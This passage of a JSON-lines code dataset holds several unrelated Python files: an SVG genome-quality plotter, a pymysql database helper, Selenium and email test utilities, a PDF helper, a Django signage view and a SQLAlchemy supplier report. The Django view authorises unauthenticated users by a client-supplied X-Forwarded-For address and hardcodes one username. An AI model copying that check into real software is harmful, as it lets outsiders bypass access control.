header_start_y, label_start_x, label_start_y):\n \"\"\"Plot genome completeness and contamination columns.\"\"\"\n quality_group = svgwrite.container.Group(id='genome_quality')\n dwg.add(quality_group)\n for c, gene_name in enumerate(['Completeness (%)', 'Contamination (%)']):\n x = label_start_x + (c + 0.5) * self.qual_col_width\n t = dwg.text(gene_name, x=[\n x], y=[\n header_start_y], font_size='%fpt' % self.font_size, text_anchor='start', direction='ltr', fill='black')\n t.rotate(-45, (x, header_start_y))\n quality_group.add(t)\n\n for r, bin_label in enumerate(bin_labels):\n for c, q in enumerate(quality[bin_label]):\n t = dwg.text('%.1f' % q, x=[\n label_start_x + (c + 0.5) * self.qual_col_width], y=[\n label_start_y + r * self.row_height], font_size='%fpt' % self.font_size, text_anchor='middle', direction='ltr', fill='black')\n quality_group.add(t)\n\n def _cell_properties(self, perc_common_bases):\n \"\"\"Get desired color and size of heat map cell for a given percentage of common bases.\"\"\"\n color = 'rgb(255,255,255)'\n size = self.col_width - 2 * self.cell_offset\n if perc_common_bases >= 100:\n color = 'rgb(165,15,21)'\n elif perc_common_bases >= 90:\n color = 'rgb(222,45,38)'\n size = math.sqrt(0.9) * size\n elif perc_common_bases >= 80:\n color = 'rgb(251,106,74)'\n size = math.sqrt(0.8) * size\n elif perc_common_bases >= 70:\n color = 'rgb(252,146,114)'\n size = math.sqrt(0.7) * size\n elif perc_common_bases >= 60:\n color = 'rgb(252,187,161)'\n size = math.sqrt(0.6) * size\n elif perc_common_bases >= 50:\n color = 'rgb(254,229,217)'\n size = math.sqrt(0.5) * size\n return (color, size)\n\n def _render_row(self, dwg, bin_labels, bm_labels, common_bases, start_x, start_y):\n \"\"\"Render rows showing percentage of common bases.\"\"\"\n table_group = svgwrite.container.Group(id='table')\n dwg.add(table_group)\n for r, bin_label in enumerate(bin_labels):\n for c, bm_label in enumerate(bm_labels):\n perc_cb = common_bases[bin_label].get(bm_label, 0)\n color, size = self._cell_properties(perc_cb)\n x = start_x + c * self.col_width\n y = start_y + r * self.row_height\n if perc_cb > 0:\n base_color, base_size = self._cell_properties(0)\n rect = dwg.rect(insert=(x + 0.5 * (base_size - size),\n y + 0.5 * (base_size - size)), size=(\n size, size), fill=color)\n rect.stroke(color='rgb(196,196,196)', width=0.1)\n table_group.add(rect)\n if False:\n t = dwg.text('%d' % perc_cb, x=[\n x + 0.5 * self.col_width], y=[\n y + 0.5 * self.row_height + 0.5 * self.cell_font_size], font_size='%fpt' % self.cell_font_size, text_anchor='middle', direction='ltr', fill='rgb(0,0,0)')\n table_group.add(t)\n\n def _render_legend(self, dwg):\n \"\"\"Render legend.\"\"\"\n legend_group = svgwrite.container.Group(id='legend')\n dwg.add(legend_group)\n x = self.fig_size_x\n y = 0\n base_color, base_size = self._cell_properties(0)\n for index, perc_common_bases in enumerate([100, 90, 80, 70, 60, 50]):\n color, size = self._cell_properties(perc_common_bases)\n rect = dwg.rect(insert=(x + 0.5 * (base_size - size),\n y + 0.5 * (base_size - size)), size=(\n size, size), fill=color)\n rect.stroke(color='rgb(196,196,196)', width=0.1)\n legend_group.add(rect)\n legend_str = '%d' % perc_common_bases\n if perc_common_bases != 100:\n legend_str = '>' + legend_str\n t = dwg.text(legend_str, x=[\n x + base_size + self.cell_offset], y=[\n y + 0.5 * base_size + 0.5 * self.font_size], font_size='%fpt' % self.font_size, direction='ltr', fill='rgb(0,0,0)')\n legend_group.add(t)\n y += size + self.cell_offset\n\n def plot(self, common_bases, quality, output_plot):\n \"\"\"Create plot.\n \n Parameters\n ----------\n common_bases : d[unitem bid][binning method] -> percent common bases\n Percentage of common bases for each binning method.\n quality : d[unitem id] -> (completeness, contamination)\n Completeness and contamination of bins.\n output_plot : str\n Desired output file.\n \"\"\"\n bin_labels = alphanumeric_sort(common_bases)\n binning_methods = set()\n for bid in common_bases:\n for bm in common_bases[bid]:\n binning_methods.add(bm)\n\n bm_labels = alphanumeric_sort(binning_methods)\n table_start_x = 0\n table_start_y = 0\n if not output_plot.endswith('.svg'):\n output_plot += '.svg'\n self.fig_size_x = table_start_x + len(bm_labels) * self.col_width\n self.fig_size_x += 2 * self.qual_col_width + 0.5 * self.col_width\n self.fig_size_y = table_start_y + len(bin_labels) * self.row_height\n dwg = svgwrite.Drawing(filename=output_plot, size=(\n self.fig_size_x, self.fig_size_y), profile='full')\n dwg.set_desc(title='UniteM shared base pair plot.')\n self._render_legend(dwg)\n label_start_x = table_start_x\n label_start_y = table_start_y + 0.5 * self.row_height + 0.45 * self.font_size\n self._render_label_col(dwg, bin_labels, label_start_x, label_start_y, 'bin_labels')\n header_start_y = table_start_y - 0.5 * self.font_size\n label_start_x = table_start_x + 0.5 * self.col_width\n label_start_y = table_start_y + 0.5 * self.row_height + 0.45 * self.font_size\n self._render_genome_quality_cols(dwg, bin_labels, quality, header_start_y, label_start_x, label_start_y)\n table_start_x += 2 * self.qual_col_width + 0.5 * self.col_width\n label_start_x = table_start_x\n header_row_start_y = table_start_y - 0.5 * self.font_size\n self._render_label_row(dwg, bm_labels, label_start_x, header_row_start_y, 'binning_method_labels')\n self._render_row(dwg, bin_labels, bm_labels, common_bases, table_start_x, table_start_y)\n dwg.save()", "sub_path": "pycfiles/unitem-0.0.18.tar/plot_common_bases.py", "file_name": "plot_common_bases.py", "file_ext": "py", "file_size_in_byte": 8581, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "svgwrite.container.Group", "line_number": 29, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 29, "usage_type": "attribute"}, {"api_name": "svgwrite.container.Group", "line_number": 39, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 39, "usage_type": "attribute"}, {"api_name": "svgwrite.container.Group", "line_number": 51, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 51, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 76, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 79, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 82, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 85, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 88, "usage_type": "call"}, {"api_name": "svgwrite.container.Group", "line_number": 93, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 93, "usage_type": "attribute"}, {"api_name": "svgwrite.container.Group", "line_number": 116, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 116, "usage_type": "attribute"}, {"api_name": "biolib.common.alphanumeric_sort", "line_number": 149, "usage_type": "call"}, {"api_name": "biolib.common.alphanumeric_sort", "line_number": 155, "usage_type": "call"}, {"api_name": "svgwrite.Drawing", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "525932682", "text": "#coding: utf-8\nimport pymysql\nimport dbconfig\nimport datetime\n\n#所有的数据操作都放在try-finally里面,以便数据库最终都能顺利关闭连接\nclass DBHelper:\n\n\t#数据库连接,每次操作数据表格前都要连接,末尾指定编码\n\tdef connect(self, database=\"crimemap\"):\n\t\treturn pymysql.connect(host='localhost',\n\t\tuser=dbconfig.db_user,\n\t\tpasswd=dbconfig.db_password,\n\t\tdb=database,\n charset = 'utf8')\n\n\t#之前测试实验从crimes获取description数据\n\tdef get_all_inputs(self):\n\t\tconnection = self.connect() #每次操作之前都要先和数据库建立连接\n\t\ttry:\n\t\t\tquery = \"SELECT description FROM crimes;\" #从crimes数据库选择description数据,注意最后有分号,应该是SQL的语法\n\t\t\twith connection.cursor() as cursor: #使用with-as\n\t\t\t\tcursor.execute(query) #指针执行这个请求之后,cursor就指向所需数据了。\n\t\t\treturn cursor.fetchall() #使用fetchall方法把指向的数据变成Python能处理的列表数据\n\t\tfinally:\n\t\t\tconnection.close()\n\n\t#之前测试实验向crimes插入description数据\n\tdef add_input(self, data):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\t# small fix to SQL injection\n\t\t\tquery = \"INSERT INTO crimes (description) VALUES (%s);\" #作为测试用只插入一个description数据\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query, data) #执行请求操作\n\t\t\t\tconnection.commit() #不同于读取数据,插入数据对数据库修改了所以要提交修改才能生效\n\t\tfinally:\n\t\t\tconnection.close()\n\n\t#删除crimes表格的所有数据\n\tdef clear_all(self):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\tquery = \"DELETE FROM crimes;\" #删除crimes数据库的所有内容\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query) #执行请求操作\n\t\t\t\tconnection.commit() #删除数据对数据库修改了所以要提交修改才能生效\n\t\tfinally:\n\t\t\tconnection.close()\n\n\tdef add_record(self, category, date, latitude, longitude, description):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\tquery = \"INSERT INTO crimes (category, date, latitude, longitude, description) VALUES (%s, %s, %s, %s, %s);\"\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query, (category, date, latitude, longitude, description))\n\t\t\t\tconnection.commit()\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\tfinally:\n\t\t\tconnection.close()\n\t\n\tdef get_all_records(self):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\tquery = \"SELECT latitude, longitude, date, category, description FROM crimes;\"\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query)\n\t\t\tnamed_crimes = []\n\t\t\t#从cursor提取元组数据转换为JSON数据保存到列表,方便后面在JavaScript处理\n\t\t\tfor crime in cursor:\n\t\t\t\tnamed_crime = {\n\t\t\t\t\t'latitude': crime[0],\n\t\t\t\t\t'longitude': crime[1],\n\t\t\t\t\t'date': datetime.datetime.strftime(crime[2], '%Y-%m-%d'),\n\t\t\t\t\t'category': crime[3],\n\t\t\t\t\t'description': crime[4]\n\t\t\t\t}\n\t\t\t\tnamed_crimes.append(named_crime)\n\t\t\treturn named_crimes\n\t\tfinally:\n\t\t\tconnection.close()\n", "sub_path": "dbhelper.py", "file_name": "dbhelper.py", "file_ext": "py", "file_size_in_byte": 2993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymysql.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "dbconfig.db_user", "line_number": 12, "usage_type": "attribute"}, {"api_name": "dbconfig.db_password", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "attribute"}]} +{"seq_id": "624480608", "text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n\nclass ParkSideLendingUtilityLibException(Exception):\n \"\"\"A Exception class for parkside lending utility library\"\"\"\n\n\nclass UtilityLib(object):\n \"\"\"Class for common functions across all Parkside Lending pages\"\"\"\n def __init__(self, driver_handle):\n \"\"\"Constructor\n\n Args:\n driver_handle: The initialized web driver object.\n \"\"\"\n self.driver = driver_handle\n\n def TakeScreenShot(self, path):\n \"\"\"Take the screenshot and save it to certain path\n\n Args:\n path: The path name for saving screen shot.\n \"\"\"\n self.driver.save_screenshot(path)\n\n def GotoPage(self, nav_button_index, page):\n \"\"\"Go to certain page via click the nav links and menu options under\n them.\n\n Args:\n nav_button_index: The sequence number of nav links, such as About\n Us nav link is at first position, so it's 1.\n page: The page menu option we will click and navigate to, such as\n Contact Us page is Contact_Us.\n \"\"\"\n nav_button_elements = self.driver.find_elements_by_xpath(\n '//ul[@class=\"nav-links\"]/li')\n ActionChains(self.driver).move_to_element(\n nav_button_elements[nav_button_index-1]).perform()\n page_link = WebDriverWait(self.driver, 30).until(\n EC.visibility_of_element_located((\n By.XPATH, '//li/a[@href=\"/Support/' + page + '\"]')))\n ActionChains(self.driver).move_to_element(page_link).click().perform()\n\n\nclass SendEmailNotification(object):\n \"\"\"Class for sending email notifications\"\"\"\n def SendEmailResult(self, source, destinations, message, subject,\n attachment_names, password, smtp_server_info):\n \"\"\"Send Email Result from source address to destination addresses with\n Formatted HTML content and screen shots.\n\n Args:\n source: Sender address.\n destinations: A list of destination addresses.\n message: Main email message.\n subject: The title of email.\n attachment_names: The name of the attachments.\n password: The password of sender mailbox.\n smtp_server_info: A tuple of sender smtp server information.\n Server address and port.\n \"\"\"\n fromaddr = source\n toaddrs = ', '.join(destinations)\n msg = MIMEMultipart('related')\n\n msg['From'] = fromaddr\n msg['To'] = toaddrs\n msg['Subject'] = subject\n html = \"\"\"\n

Here is the screen shot of contact us page.

\n
\n \n

Here is the text output of tests

\n
{}
\n

The screen shots of failures or errors are in the attachment.

\n \"\"\".format(message)\n msg.attach(MIMEText(html, 'html'))\n for attachment in attachment_names:\n filename = attachment\n img = open(attachment, \"rb\").read()\n msgImg = MIMEImage(img, 'png')\n if 'cupage' in attachment:\n msgImg.add_header('Content-ID', '')\n else:\n msgImg.add_header('Content-ID', '')\n msgImg.add_header('Content-Disposition', 'inline', filename=filename)\n msg.attach(msgImg)\n server = smtplib.SMTP(smtp_server_info[0], smtp_server_info[1])\n server.starttls()\n server.login(fromaddr, password)\n text = msg.as_string()\n server.sendmail(fromaddr, destinations, text)\n server.quit()", "sub_path": "tests/pageobject/utility.py", "file_name": "utility.py", "file_ext": "py", "file_size_in_byte": 3961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 47, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 48, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 50, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 72, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 85, "usage_type": "call"}, {"api_name": "email.mime.image.MIMEImage", "line_number": 89, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "423643281", "text": "from StringIO import StringIO\nfrom pdfkit import from_string\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\n\nOPTIONS = {\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n 'encoding': \"UTF-8\",\n 'quiet': '',\n # Security.\n 'disable-javascript': '',\n 'disable-external-links': '',\n 'disable-internal-links': '',\n 'disable-local-file-access': '',\n}\n\nPDF_MIMETYPE = 'application/pdf'\n\n\ndef html_to_pdf(html, opts=None):\n options = OPTIONS.copy()\n options.update(opts or {})\n\n return from_string(html, False, options=options)\n\n\nclass WritePDF:\n\n def __init__(self, opts=None):\n self.opts = (opts or {}).copy()\n self.output = PdfFileWriter()\n\n def add_by_pages(self, html, opts=None):\n self.opts.update(opts or {})\n\n stream = StringIO()\n stream.write(html_to_pdf(html, opts=self.opts))\n\n reader = PdfFileReader(stream)\n for page in range(reader.pages.lengthFunction()):\n self.output.addPage(reader.getPage(page))\n\n return self.output\n\n def as_content(self):\n stream = StringIO()\n self.output.write(stream)\n\n content = stream.getvalue()\n stream.close()\n\n return content\n", "sub_path": "core/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pdfkit.from_string", "line_number": 27, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileWriter", "line_number": 34, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 39, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 42, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "215405114", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport logging\nimport datetime\nfrom django import http\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render\nfrom django.utils import timezone\nfrom intranet import settings\nfrom ..users.models import User\nfrom ..eighth.models import EighthBlock, EighthSignup\nfrom ..eighth.serializers import EighthBlockDetailSerializer\nfrom ...utils.serialization import safe_json\n\nlogger = logging.getLogger(__name__)\n\n\ndef eighth_signage(request, block_id=None):\n remote_addr = (request.META[\"HTTP_X_FORWARDED_FOR\"] if \"HTTP_X_FORWARDED_FOR\" in request.META else request.META.get(\"REMOTE_ADDR\", \"\"))\n if not request.user.is_authenticated() and remote_addr not in settings.INTERNAL_IPS:\n return render(request, \"error/403.html\", {\n \"reason\": \"You are not authorized to view this page.\"\n }, status=403)\n\n if block_id is None:\n next_block = EighthBlock.objects.get_first_upcoming_block()\n if next_block is not None:\n block_id = next_block.id\n else:\n last_block = EighthBlock.objects.order_by(\"date\").last()\n if last_block is not None:\n block_id = last_block.id\n\n block_increment = request.GET.get(\"block_increment\", 0)\n try:\n block_increment = int(block_increment)\n except ValueError:\n block_increment = 0\n\n block = None\n if block_increment > 0:\n next_blocks = next_block.next_blocks()\n if next_blocks.count() >= block_increment:\n block = next_blocks[block_increment - 1]\n\n if not block:\n try:\n block = (EighthBlock.objects\n .prefetch_related(\"eighthscheduledactivity_set\")\n .get(id=block_id))\n except EighthBlock.DoesNotExist:\n if EighthBlock.objects.count() == 0:\n # No blocks have been added yet\n return render(request, \"eighth/display.html\", {\"no_blocks\": True})\n else:\n # The provided block_id is invalid\n raise http.Http404\n\n user = User.objects.get(username=\"awilliam\")\n\n serializer_context = {\n \"request\": request,\n \"user\": user\n }\n block_info = EighthBlockDetailSerializer(block, context=serializer_context).data\n\n context = {\n \"user\": user,\n \"real_user\": request.user,\n \"block_info\": block_info,\n \"activities_list\": safe_json(block_info[\"activities\"]),\n \"active_block\": block,\n \"active_block_current_signup\": None,\n \"no_title\": (\"no_title\" in request.GET),\n \"no_detail\": not (\"detail\" in request.GET),\n \"no_rooms\": (\"no_rooms\" in request.GET),\n \"no_user_display\": True,\n \"no_fav\": True\n }\n\n return render(request, \"eighth/display.html\", context)\n", "sub_path": "intranet/apps/signage/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2931, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "intranet.settings.INTERNAL_IPS", "line_number": 22, "usage_type": "attribute"}, {"api_name": "intranet.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects.get_first_upcoming_block", "line_number": 28, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 28, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.objects.order_by", "line_number": 32, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 32, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.objects.prefetch_related", "line_number": 50, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 50, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.DoesNotExist", "line_number": 53, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 53, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.objects.count", "line_number": 54, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 54, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 59, "usage_type": "attribute"}, {"api_name": "django.http", "line_number": 59, "usage_type": "name"}, {"api_name": "users.models.User.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "users.models.User.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "users.models.User", "line_number": 61, "usage_type": "name"}, {"api_name": "eighth.serializers.EighthBlockDetailSerializer", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.serialization.safe_json", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "350650811", "text": "from app import db\nfrom app.api.helpers import Service\nfrom sqlalchemy import func\nfrom sqlalchemy.sql import text\nfrom app.models import Address, Product, RecruiterInfo, Supplier, SupplierDomain, Domain\n\n\nclass SuppliersService(Service):\n __model__ = Supplier\n\n def __init__(self, *args, **kwargs):\n super(SuppliersService, self).__init__(*args, **kwargs)\n\n def get_unassessed(self):\n s = text(\n \"select distinct \"\n 'd.id \"domain_id\",'\n 'd.name \"domain_name\",'\n 's.id \"supplier_id\",'\n 's.code \"supplier_code\",'\n 's.name \"supplier_name\",'\n 's.data#>>(\\'{pricing,\"\\'||d.name||\\'\",maxPrice}\\')::text[] \"supplier_price\",'\n 'u.supplier_last_logged_in,'\n 'cs.id \"case_study_id\" '\n 'from case_study cs '\n 'inner join supplier s on s.code = cs.supplier_code '\n \"inner join domain d on d.name = cs.data->>'service' \"\n 'inner join supplier_domain sd on sd.domain_id = d.id '\n ' and sd.supplier_id = s.id '\n \" and sd.status = 'unassessed'\"\n 'inner join ('\n ' select supplier_code, '\n ' max(logged_in_at) \"supplier_last_logged_in\" '\n ' from \"user\" '\n ' group by supplier_code'\n ') u on u.supplier_code = s.code '\n 'where s.data#>>(\\'{pricing,\"\\'||d.name||\\'\",maxPrice}\\')::text[] is not null'\n )\n result = db.session.execute(s)\n return [dict(r) for r in result]\n\n def get_suppliers(self):\n subquery = (\n db\n .session\n .query(\n SupplierDomain.supplier_id,\n func.json_agg(\n func.json_build_object(\n 'category', Domain.name,\n 'status', SupplierDomain.status,\n 'recruiterInfo', func.json_build_object(\n 'id', RecruiterInfo.id,\n 'activeCandidates', RecruiterInfo.active_candidates,\n 'databaseSize', RecruiterInfo.database_size,\n 'placedCandidates', RecruiterInfo.placed_candidates,\n 'margin', RecruiterInfo.margin,\n 'markup', RecruiterInfo.markup,\n ).label('recruiters'),\n 'pricing', func.json_build_object(\n 'supplierPrice', Supplier.data['pricing'][Domain.name]['maxPrice'].astext.label('maxPrice'),\n 'priceStatus', SupplierDomain.price_status,\n 'priceMinimum', Domain.price_minimum,\n 'priceMaximum', Domain.price_maximum,\n 'criteriaNeeded', Domain.criteria_needed\n )\n )\n ).label('categories')\n )\n .join(Domain)\n .join(Supplier)\n .outerjoin(RecruiterInfo)\n .group_by(SupplierDomain.supplier_id)\n .subquery()\n )\n\n product_subquery = (\n db\n .session\n .query(\n Product.supplier_code,\n func.json_agg(\n func.json_build_object(\n 'productName', Product.name,\n 'productSummary', Product.summary,\n 'productWebsite', Product.website,\n 'productPricingLink', Product.pricing\n )\n ).label('products')\n )\n .group_by(Product.supplier_code)\n .subquery()\n )\n\n address_subquery = (\n db\n .session\n .query(\n Address.supplier_code,\n func.json_agg(\n func.json_build_object(\n 'addressLine', Address.address_line,\n 'suburb', Address.suburb,\n 'state', Address.state,\n 'postalCode', Address.postal_code,\n )\n ).label('addresses')\n )\n .group_by(Address.supplier_code)\n .subquery()\n )\n\n result = (\n db\n .session\n .query(\n Supplier.code,\n Supplier.name,\n Supplier.abn,\n Supplier.status,\n Supplier.creation_time.label('creationTime'),\n Supplier.data['seller_type']['sme'].astext.label('sme'),\n Supplier.website,\n Supplier.linkedin,\n Supplier.data['number_of_employees'].label('numberOfEmployees'),\n Supplier.data['seller_type']['start_up'].astext.label('startUp'),\n Supplier.data['seller_type']['nfp_social_enterprise'].astext.label('notForProfit'),\n Supplier.data['regional'],\n Supplier.data['travel'],\n Supplier.data['seller_type']['disability'].astext.label('disability'),\n Supplier.data['seller_type']['female_owned'].astext.label('femaleOwned'),\n Supplier.data['seller_type']['indigenous'].astext.label('indigenous'),\n Supplier.data['representative'],\n Supplier.data['email'],\n Supplier.data['phone'],\n Supplier.data['contact_name'].label('contactName'),\n Supplier.data['contact_email'].label('contactEmail'),\n Supplier.data['contact_phone'].label('contactPhone'),\n subquery.columns.categories,\n product_subquery.columns.products,\n address_subquery.columns.addresses,\n )\n .outerjoin(subquery, Supplier.id == subquery.columns.supplier_id)\n .outerjoin(product_subquery, Supplier.code == product_subquery.columns.supplier_code)\n .outerjoin(address_subquery, Supplier.code == address_subquery.columns.supplier_code)\n .order_by(Supplier.code)\n .all()\n )\n\n return [r._asdict() for r in result]\n", "sub_path": "app/api/services/reports/suppliers.py", "file_name": "suppliers.py", "file_ext": "py", "file_size_in_byte": 6244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.api.helpers.Service", "line_number": 8, "usage_type": "name"}, {"api_name": "app.models.Supplier", "line_number": 9, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.text", "line_number": 15, "usage_type": "call"}, {"api_name": "app.db.session.execute", "line_number": 39, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 39, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo", "line_number": 72, "usage_type": "argument"}, {"api_name": "app.models.Supplier", "line_number": 71, "usage_type": "argument"}, {"api_name": "app.models.Domain", "line_number": 70, "usage_type": "argument"}, {"api_name": "app.db.session.query", "line_number": 44, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 44, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 44, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.supplier_id", "line_number": 47, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 47, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_agg", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 48, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 49, "usage_type": "name"}, {"api_name": "app.models.Domain.name", "line_number": 50, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 50, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.status", "line_number": 51, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 51, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 52, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.id", "line_number": 53, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 53, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.active_candidates", "line_number": 54, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.database_size", "line_number": 55, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 55, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.placed_candidates", "line_number": 56, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 56, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.margin", "line_number": 57, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 57, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.markup", "line_number": 58, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 60, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 61, "usage_type": "name"}, {"api_name": "app.models.Domain.name", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 61, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.price_status", "line_number": 62, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 62, "usage_type": "name"}, {"api_name": "app.models.Domain.price_minimum", "line_number": 63, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 63, "usage_type": "name"}, {"api_name": "app.models.Domain.price_maximum", "line_number": 64, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 64, "usage_type": "name"}, {"api_name": "app.models.Domain.criteria_needed", "line_number": 65, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 65, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.supplier_id", "line_number": 73, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 73, "usage_type": "name"}, {"api_name": "app.db.session.query", "line_number": 78, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 78, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 78, "usage_type": "name"}, {"api_name": 